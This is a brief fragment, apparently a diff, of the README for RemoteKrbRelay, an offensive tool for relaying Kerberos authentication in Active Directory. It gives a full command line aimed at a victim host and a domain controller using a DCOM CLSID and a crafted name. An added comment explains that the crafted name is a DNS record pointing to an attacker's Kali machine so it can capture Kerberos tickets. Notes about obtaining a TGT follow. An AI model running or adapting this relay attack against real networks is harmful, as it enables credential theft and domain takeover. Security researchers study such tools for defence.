CICADA8-Research/RemoteKrbRelay/README.md

 .\RemoteKrbRelay.exe -ldapwhoami -victim win10.vostok.street -target dc01.vostok.street -clsid f87b28f1-da9a-4f35-8ec0-800efcf26b83 -local dc011UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAwbEAYBAAAAA

 # but I haven't implemented the relay from Initial OXID Request yet.
 Do it BRO! :)
+# dc011UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAwbEAYBAAAAA <- this is DNS A record that points to kali (thx to CredMarshalTargetInfo() because i can receive tkt on RPCSS/dc01)
 ```

 - [ ] U can get TGT in AP-REQ.
 What if des cryptography is used?